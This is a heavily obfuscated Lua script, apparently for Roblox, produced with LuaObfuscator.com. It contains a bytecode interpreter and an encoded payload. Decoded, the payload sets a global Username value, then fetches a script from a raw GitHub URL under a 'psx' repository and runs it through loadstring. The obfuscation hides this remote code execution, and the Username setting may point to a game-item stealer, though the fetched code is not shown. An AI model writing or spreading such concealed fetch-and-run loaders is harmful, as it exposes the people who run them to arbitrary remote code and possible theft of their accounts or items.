--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.1) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (3==v0) then v13=select;v14=unpack or table.unpack;v15=tonumber;v16=nil;v0=4;end if (4==v0) then v16=function(v20,v21,...)local v27=1;local v28;v20=v5(v4(v20,5),"..",function(v29)if (v2(v29,2)==79) then local v82=0;while true do if (v82==0) then v28=v1(v4(v29,1,1));return "";end end else local v83=v3(v1(v29,16));if v28 then local v104=v6(v83,v28);v28=nil;return v104;else return v83;end end end);local function v30(v31,v32,v33)if v33 then local v84=0 -(0 -0);local v85;while true do if (v84==(0 + 0)) then v85=(v31/((5 -3)^(v32-(1 + 0))))%(((3346 -(1363 + 465)) -(601 + 915))^(((v33-(1 -0)) -(v32-(1091 -(465 + 625)))) + (2 -1)));return v85-(v85%(1357 -(40 + 1316)));end end else local v86=0 + 0;local v87;while true do if ((543 -(393 + 150))==v86) then v87=(3 -1)^(v32-(2 -1));return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (0 + 0 + 0);end end end end local function v34()local v47=(4345 -2854) -(286 + 1205);local v48;while true do if ((0 -0)==v47) then v48=v2(v20,v27,v27);v27=v27 + (1 -0);v47=1 + 0 + 0;end if (v47==1) then return v48;end end end local function v35()local v49=1517 -(480 + 1037);local v50;local v51;while true do if (v49==(1930 -((1791 -1323) + 1462))) then v50,v51=v2(v20,v27,v27 + (2 -0));v27=v27 + (1987 -((3197 -(1640 + 57)) + 485));v49=1 + (323 -(260 + 63));end if (v49==1) then return (v51 * ((134 + 283) -161)) + v50;end end end local function v36()local v52,v53,v54,v55=v2(v20,v27,v27 + (6 -3));v27=v27 + 1 + 3;return (v55 * (16779117 -(300 + (3396 -(1338 + 457))))) + (v54 * ((110375 + 82334) -127173)) + (v53 * ((1285 -(102 + 171)) -756)) + v52;end local function v37()local v56=v36();local v57=v36();local v58=2 -1;local v59=(v30(v57,4 -3,85 -65) * ((1849 -((1457 -1000) + (6242 -4852)))^((142 -80) -30))) + v56;local v60=v30(v57,6 + 15,31);local v61=((v30(v57,113 -81)==(1298 -(1011 + 286))) and  -(1 + 0 + 0)) or (1 + 0);if (v60==0) then if (v59==(0 -0)) then return v61 * (209 -(163 + 46));else v60=427 -(409 + 17);v58=0 -0;end elseif (v60==(4509 -2462)) then return ((v59==(849 -(847 + 2))) and (v61 * ((418 -(312 + 105))/(1776 -(939 + 837))))) or (v61 * NaN);end return v9(v61,v60-((2080 + 435) -1492)) * (v58 + (v59/((333 -(225 + 106))^(14 + 38))));end local function v38(v39)local v62;if  not v39 then v39=v36();if (v39==(1280 -(516 + 764))) then return "";end end v62=v4(v20,v27,(v27 + v39) -(1 + 0));v27=v27 + v39;local v63={};for v75=1334 -(45 + 1288), #v62 do v63[v75]=v3(v2(v4(v62,v75,v75)));end return v7(v63);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v64=0;local v65;local v66;local v67;local v68;local v69;local v70;local v71;while true do if (v64==0) then v65=0;v66=nil;v64=714 -(101 + 612);end if (v64~=(1296 -(113 + 1181))) then else local v98=0;local v99;while true do if (v98==(0 -0)) then v99=0 + 0;while true do if (v99==1) then v64=3;break;end if (v99==(0 + 0)) then v69=nil;v70=nil;v99=1;end end break;end end end if (v64==3) then v71=nil;while true do local v105=1483 -(1327 + 156);while true do if (v105==1) then if (v65~=(5 -3)) then else local v111=0;while true do if (v111~=1) then else local v114=0;while true do if (v114==(0 + 0)) then local v120=0 + 0;while true do if (v120==(1811 -(1306 + 505))) then for v154=1,v36() do v68[v154]=v36();end return v69;end end end end end if (v111~=(0 -0)) then else local v115=0;while true do if (0==v115) then local v121=0;while true do if (v121==(1241 -(102 + 1138))) then v115=1604 -(1205 + 398);break;end if (v121~=0) then else for v156=1,v36() do local v157=0 + 0;local v158;while true do if (v157==0) then v158=v34();if (v30(v158,1,1)==(0 -0)) then local v172=0;local v173;local v174;local v175;local v176;local v177;while true do if (v172==(1281 -(1116 + 163))) then v177=nil;while true do if (v173~=0) then else local v185=1337 -(734 + 603);while true do if (v185==1) then v173=1;break;end if (v185==(0 + 0)) then local v188=0;while true do if (v188~=0) then else v174=1074 -(821 + 253);v175=nil;v188=1;end if (v188==(886 -(460 + 425))) then v185=1 -0;break;end end end end end if (v173~=2) then else while true do if (3~=v174) then else if (v30(v176,3 + 0,3)==(1 -0)) then v177[8 -4]=v71[v177[4]];end v66[v156]=v177;break;end if (v174~=(1214 -(740 + 474))) then else local v190=0;local v191;while true do if ((0 + 0)~=v190) then else v191=0;while true do if (v191==1) then v174=1;break;end if (0==v191) then local v198=1859 -(987 + 872);while true do if (v198~=1) then else v191=3 -2;break;end if (v198~=0) then else local v204=0 + 0;while true do if (v204~=(0 -0)) then else v175=v30(v158,2,3);v176=v30(v158,14 -10,20 -14);v204=1 + 0;end if (v204==1) then v198=1;break;end end end end end end break;end end end if (1==v174) then local v192=0 + 0;local v193;while true do if ((0 + 0)==v192) then v193=0;while true do if (v193==0) then v177={v35(),v35(),nil,nil};if (v175==(0 -0)) then local v199=0;while true do if (v199==(0 -0)) then v177[3]=v35();v177[4]=v35();break;end end elseif (v175==1) then v177[3]=v36();elseif (v175==2) then v177[1321 -(396 + 922)]=v36() -((2 -0)^(1878 -(1667 + 195)));elseif (v175==(9 -6)) then local v209=0;local v210;while true do if (v209~=0) then else v210=0;while true do if (v210==0) then v177[3]=v36() -(2^(9 + 7));v177[16 -12]=v35();break;end end break;end end end v193=1;end if (v193==(1 + 0)) then v174=2;break;end end break;end end end if (v174==2) then local v194=0;local v195;while true do if ((0 + 0)==v194) then v195=0;while true do if (0~=v195) then else if (v30(v176,3 -2,1)==(1 + 0)) then v177[3 -1]=v71[v177[2]];end if (v30(v176,4 -2,2 + 0)==1) then v177[579 -(293 + 283)]=v71[v177[620 -(312 + 305)]];end v195=1189 -(567 + 621);end if (v195~=(4 -3)) then else v174=1990 -(466 + 1521);break;end end break;end end end end break;end if ((1 + 0)==v173) then local v186=0 + 0;while true do if (v186==(3 -2)) then v173=8 -6;break;end if (v186==(0 + 0)) then v176=nil;v177=nil;v186=1;end end end end break;end if (v172==(1298 -(885 + 412))) then v175=nil;v176=nil;v172=2;end if (v172~=(0 -0)) then else v173=0 + 0;v174=nil;v172=1;end end end break;end end end for v159=624 -(340 + 283),v36() do v67[v159-(2 -1)]=v42();end v121=1;end end end if (v115~=1) then else v111=1;break;end end end end end break;end if ((225 -(219 + 6))~=v105) then else local v110=0 + 0;while true do if (v110~=(1857 -(1470 + 387))) then else if (v65~=(0 + 0)) then else local v116=0 -0;local v117;local v118;while true do if (v116~=(927 -(600 + 327))) then else v117=0;v118=nil;v116=1;end if (v116~=1) then else while true do if (v117==(0 -0)) then v118=0;while true do if (v118==(1 + 0)) then v68={};v69={v66,v67,nil,v68};v118=2 + 0;end if (v118==(7 -5)) then v65=1 -0;break;end if (v118==(0 -0)) then local v169=0;while true do if (v169==1) then v118=2 -1;break;end if (v169==(0 + 0)) then v66={};v67={};v169=2 -1;end end end end break;end end break;end end end if (v65~=1) then else local v119=0 -0;while true do if (v119~=(0 -0)) then else local v122=0;while true do if (v122==0) then local v144=252 -(181 + 71);while true do if (v144==0) then v70=v36();v71={};v144=1;end if ((320 -(103 + 216))~=v144) then else v122=1;break;end end end if (v122==(4 -3)) then v119=1;break;end end end if (v119~=(1 -0)) then else local v123=0;while true do if (v123==1) then v119=6 -4;break;end if (v123==(0 -0)) then for v161=1 -0,v70 do local v162=0;local v163;local v164;local v165;while true do if (v162~=1) then else v165=nil;while true do if (v163==1) then if (v164==(2 -1)) then v165=v34()~=0;elseif (v164==(2 + 0)) then v165=v37();elseif (v164~=3) then else v165=v38();end v71[v161]=v165;break;end if (v163==0) then local v181=0;local v182;while true do if (v181==(0 -0)) then v182=0;while true do if (v182==(1 + 0)) then v163=1;break;end if (v182~=0) then else local v187=0;while true do if (1~=v187) then else v182=4 -3;break;end if (v187==(0 + 0)) then v164=v34();v165=nil;v187=3 -2;end end end end break;end end end end break;end if (v162==0) then v163=1737 -(785 + 952);v164=nil;v162=1;end end end v69[10 -7]=v34();v123=1;end end end if (v119==(1691 -(1502 + 187))) then v65=2;break;end end end v110=1 + 0;end if (v110~=(1 + 0)) then else v105=1 + 0;break;end end end end end break;end if (v64~=1) then else v67=nil;v68=nil;v64=2;end end end local function v43(v44,v45,v46)local v72=v44[1];local v73=v44[2];local v74=v44[3];return function(...)local v77=1;local v78= -1;local v79={...};local v80=v13("#",...) -1;local function v81()local v88=v72;local v89=v73;local v90=v74;local v91=v41;local v92={};local v93={};local v94={};for v100=0 + 0,v80 do if (((5234 -3011)<=(3227 + 824)) and (v100>=v90)) then v92[v100-v90]=v79[v100 + (1342 -(525 + 816))];else v94[v100]=v79[v100 + (654 -(164 + 489))];end end local v95=(v80-v90) + (1178 -(576 + 601));local v96;local v97;while true do local v101=0 -0;local v102;while true do if ((((2506 -(20 + 1481)) + 3471)>=((29156 -18937) -5916)) and (v101==(0 + 0))) then v102=0 + 0;while true do if ((v102==1) or ((426 + 2699)>=(1933 + (4496 -2833)))) then if ((1324<(3003 -(693 + 227))) and (v97<=4)) then if ((v97<=1) or ((8 + 0 + 0)>=3018)) then if ((v97==0) or ((3545 -(1560 + (786 -509)))==(2812 -1741))) then local v124=551 -(26 + 525);local v125;local v126;while true do if (((843 -511)<=4902) and (v124==((0 + 0) -0))) then local v146=0 + (0 -0);while true do if (((32 + 41)==(403 -(200 + 130))) and (v146==(0 + 0))) then v125=v96[2 -0];v126=v94[v96[2 + 1]];v146=1 + 0;end if ((v146==1) or (1568>=(2828 -(1021 + 156)))) then v124=1 + 0;break;end end end if ((v124==(235 -(187 + 47))) or ((1544 -793)<(1990 -1436))) then v94[v125 + 1 + 0]=v126;v94[v125]=v126[v96[9 -5]];break;end end else local v127=(839 -(342 + 497)) -0;local v128;local v129;local v130;local v131;while true do if (((3285 -(81 + (1101 -730)))<(3900 -((390 -134) + 78))) and (v127==(1459 -(88 + 1369)))) then for v166=v128,v78 do local v167=0;local v168;while true do if (((520 + (1040 -582))<2121) and (v167==0)) then v168=0;while true do if ((1142<1503) and (v168==0)) then v131=v131 + ((2705 -973) -(1208 + 523));v94[v166]=v129[v131];break;end end break;end end end break;end if ((v127==((2 + 0) -1)) or ((11259 -7151)<=(62 + (2956 -2039)))) then local v150=(0 -0) -0;while true do if (((103 + 665)<=(6808 -4459)) and (v150==(0 -0))) then v78=(v130 + v128) -(909 -(886 + 22));v131=1001 -(329 + 672);v150=1 + 0;end if ((416<(3234 -1515)) and (v150==(3 -2))) then v127=1713 -(1163 + 548);break;end end end if (((2874 -(222 + 532))>2119) and (v127==(0 + 0 + 0))) then v128=v96[53 -(31 + 20)];v129,v130=v91(v94[v128](v14(v94,v128 + (813 -((901 -(170 + 486)) + 567)),v96[1760 -(1441 + 316)])));v127=1 + (0 -0);end end end elseif (((2271 -(162 + 1))==(17 + 232 + 1859)) and (v97<=(2 -0))) then local v132=1457 -(1246 + 211);local v133;local v134;local v135;while true do if (((737 -(605 + 132))==v132) or ((2867 + 1392)<(3134 -(1203 + 106)))) then v133=0;v134=nil;v132=1 -(0 + 0);end if (((74 -(67 + 6))==v132) or ((498 + 570)>=(560 + 526))) then v135=nil;while true do if ((v133==(3 -(133 -(96 + 35)))) or ((1435 + 3165)<=(421 + 656))) then while true do if ((2327>(147 + 178)) and (v134==0)) then v135=v96[2];v94[v135]=v94[v135](v14(v94,v135 + (2 -1),v78));break;end end break;end if (((5178 -(1504 + 195))<(14079 -9378)) and (v133==(0 + 0))) then v134=1096 -(971 + 125);v135=nil;v133=2 -1;end end break;end end elseif (((9385 -(2007 + 4109))==(5081 -(1773 + 39))) and (v97==(1255 -(584 + 668)))) then v94[v96[1085 -(872 + 211)]]();else v94[v96[2 + 0 + 0]]=v96[3 + (993 -(428 + 565))];end elseif ((v97<=7) or (2170>=(1896 + 620))) then if (((3445 + 1358)==(970 + 3833)) and (v97<=(3 + 2))) then v77=v96[3];elseif ((v97==(5 + 1)) or ((4216 -2880)<1060)) then do return;end else v94[v96[6 -4]]=v46[v96[3]];end elseif (((4172 -(3584 -1461))>=((2711 -(93 + 122)) -1726)) and (v97<=8)) then if (((358 + 114)<=(9144 -6485)) and (v96[2]==v94[v96[1649 -(288 + 1357)]])) then v77=v77 + (604 -(21 + 582));else v77=v96[1530 -(568 + 959)];end elseif (((4888 -(499 + (2784 -2202)))>337) and (v97==(1 + 8))) then for v152=v96[4 -(81 -(70 + 9))],v96[1707 -(1614 + 90)] do v94[v152]=nil;end else v94[v96[2 + 0]][v96[3]]=v96[4];end v77=v77 + 1;break;end if ((634<(879 + 682)) and ((0 + (0 -0))==v102)) then v96=v88[v77];v97=v96[1 + 0];v102=1 + 0;end end break;end end end end A,B=v41(v12(v81));if  not A[1] then local v103=v44[4][v77] or "?";error("Script error at ["   .. v103   .. "]:"   .. A[2]);else return v14(A,2,B);end end;end return v43(v42(),{},v21)(...);end;v16("LOL!083O00028O0003023O005F4703083O00557365726E616D6503073O00637265612O6B7A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F526973686965732F7073782F6D61696E2F70737873637269707400153O0012043O00014O0009000100013O000E080001000200013O0004053O00020001001204000100013O000E0800010005000100010004053O00050001001207000200023O00300A000200030004001207000200053O001207000300063O00202O000300030007001204000500084O0001000300054O000200023O00022O00030002000100010004053O001400010004053O000500010004053O001400010004053O000200012O00063O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v10(),...);break;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (2==v0) then v9=math.ldexp;v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=3;end end end
